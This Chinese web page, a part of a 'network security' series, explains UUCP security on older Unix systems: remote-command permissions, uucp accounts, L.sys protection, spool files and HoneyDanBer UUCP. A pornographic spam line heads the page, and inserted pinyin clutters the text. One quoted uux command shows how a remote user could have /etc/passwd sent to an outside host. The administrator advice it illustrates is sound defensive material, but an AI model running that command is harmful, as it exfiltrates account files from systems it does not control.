日本免费全黄少妇一区二区三区-高清无码一区二区三区四区-欧美中文字幕日韩在线观看-国产福利诱惑在线网站-国产中文字幕一区在线-亚洲欧美精品日韩一区-久久国产精品国产精品国产-国产精久久久久久一区二区三区-欧美亚洲国产精品久久久久

網(wǎng)絡(luò)安全( 三 )


一行命令:
rmail
系統(tǒng)管理員可允許登錄用戶執(zhí)行netnews(rnews)的命令或遠(yuǎn)程打印命令
(lp),但決不能允許用戶執(zhí)行拷貝文件到標(biāo)準(zhǔn)輸出的命令,如cat命令或網(wǎng)絡(luò)命
令uucp,否則這些人只需在他們自己的系統(tǒng)上敲入:
uux "yoursys!uucp yoursys!/etc/passwd (outside!~/passwd)"
然后就可等待本系統(tǒng)發(fā)送出命令文件.

(3)uucp登錄
UUCP系統(tǒng)需要兩個(gè)登錄戶頭,一個(gè)是其它系統(tǒng)登錄的戶頭,另一個(gè)是系統(tǒng)
管理使用的戶頭.例如,數(shù)據(jù)傳輸?shù)卿洃纛^是nuucp,管理登錄戶頭是uucp,則在
/etc/passwd文件中應(yīng)當(dāng)有二行.
UID和GID的5號(hào)通常留給uucp,由于uucico具有管理登錄的SUID許可,因此
nuucp戶頭的UID和GID應(yīng)當(dāng)用其它值.

(4)uucp使用的文件和目錄
/usr/lib/uucp用于存放不能由用戶直接運(yùn)行的各種uucp,如uuxqt和
uucico.該目錄還含有若干個(gè)確定uucp如何操作的文件,如L.cmds和USERFILE.
這些文件只能對(duì)uucp管理戶頭可寫(系統(tǒng)管理員一定不愿讓用戶更改遠(yuǎn)程可執(zhí)
行命令表):根據(jù)安全的觀點(diǎn),該目錄中另一個(gè)系統(tǒng)管理員必須清楚的文件是
L.sys.該文件中含有uucico能調(diào)用的每個(gè)系統(tǒng)的入口項(xiàng).入口項(xiàng)數(shù)據(jù)包括
uucico所調(diào)用系統(tǒng)的電話號(hào)碼,登錄名,未加密的口令.不用說,L.sys應(yīng)當(dāng)屬于
uucp管理戶頭所有,且應(yīng)當(dāng)具有400或600存取許可.
uucp用/usr/spool/uucp目錄存放工作文件.文件名以C.開頭的文件是送
到其它系統(tǒng)的命令文件,含有在其它系統(tǒng)上拷入/出數(shù)據(jù)和執(zhí)行命令的請(qǐng)求.文
件名以D.開頭的文件用作C.文件的數(shù)據(jù)文件.文件名以X.開頭的文件是來自其
它系統(tǒng)的遠(yuǎn)程執(zhí)行請(qǐng)求,由uuxqt解釋.文件名以TM.開始的文件是從其它系統(tǒng)
傳送數(shù)據(jù)到本系統(tǒng)過程中uucp所使用的暫存文件.XQTDIR是uuxqt用于執(zhí)行X.
文件的目錄.LOGFILE可有助于管理uucp的安全,它含有執(zhí)行uucp請(qǐng)求成功與否
的信息.系統(tǒng)管理員可時(shí)常查看該文件,了解有哪些系統(tǒng)正登錄入本系統(tǒng)執(zhí)行
uucp請(qǐng)求?是什么請(qǐng)求?特別要檢查這些請(qǐng)求是否試圖做不允許的操作.

3.HONEYDANBER UUCP
有兩個(gè)主要的UUCP版本,第一個(gè)是與UNIX系統(tǒng)V一起頒布的,在本節(jié)將稱為老
UUCP,另一個(gè)版本稱為HONEYDANBER UUCP,由AT&T頒布.
HONEYDANBER UUCP較之老UUCP有若干改進(jìn):
<1>支持更多的撥號(hào)和網(wǎng)絡(luò):
. 智能自動(dòng)撥號(hào)調(diào)制解調(diào)器以及標(biāo)準(zhǔn)AT&T技術(shù)的801自動(dòng)撥號(hào)器.
. 網(wǎng)絡(luò),如DATAKIT VCS,UNET/ETHERNET, 3COM/ETHERNET, SYTEK, TCP
(BSD UNIX系統(tǒng)).
. 連接到LAN的撥號(hào)器.
. X.25永久性虛擬環(huán)網(wǎng)(用X.25協(xié)議)
<2>重新組織了/usr/spool/uucp目錄,在該目錄下,對(duì)每個(gè)遠(yuǎn)程系統(tǒng)有一個(gè)
目錄.
<3>加強(qiáng)了安全.
. USERFILE和L.cmds文件組合成一個(gè)文件Permissions.
. 可以在一級(jí)級(jí)系統(tǒng)上指定遠(yuǎn)程可執(zhí)行命令.
. 可分別控制文件傳入和文件傳出.
. 缺省的安全設(shè)置很嚴(yán)格.

(1)HONEYDANBER UUCP與老UUCP的差別
HONEYDANBER UUCP中的/usr/lib/uucp/Systems文件是原來UUCP中的
/usr/lib/uucp/L.sys.HONEYDANBER UUCP中/usr/spool/uucp/.log下的一個(gè)
目錄代替了老UUCP的文件/usr/spool/uucp/logFILE./usr/spool/uucp/.log
中的目錄uucico,uucp,uux,uuxqt含有相應(yīng)命令的記錄文件,各目錄對(duì)應(yīng)最近
處于活躍狀態(tài)的遠(yuǎn)程系統(tǒng)都有一個(gè)記錄文件(記錄文件在這些目錄中通常保存
一個(gè)星期).
如果一個(gè)調(diào)用本系統(tǒng)的遠(yuǎn)程系統(tǒng)未列于Systems文件中,uucico將不允許
該遠(yuǎn)程系統(tǒng)執(zhí)行任何操作,而是啟動(dòng)shell程序/usr/lib/uucp/remote.unknown,
由UUCP提供的該shell程序的缺省版本將在/usr/spool/uucp/.Admin/Foreign
文件中記下遠(yuǎn)程系統(tǒng)的登錄時(shí)間,日期及系統(tǒng)名.只要使remote.unknown不可
執(zhí)行,就能禁止這一操作,以達(dá)到與老UUCP兼容.
C.,D.,X.,TM.等文件存放在/usr/spool/uucp下的不同目錄中,目錄名就

推薦閱讀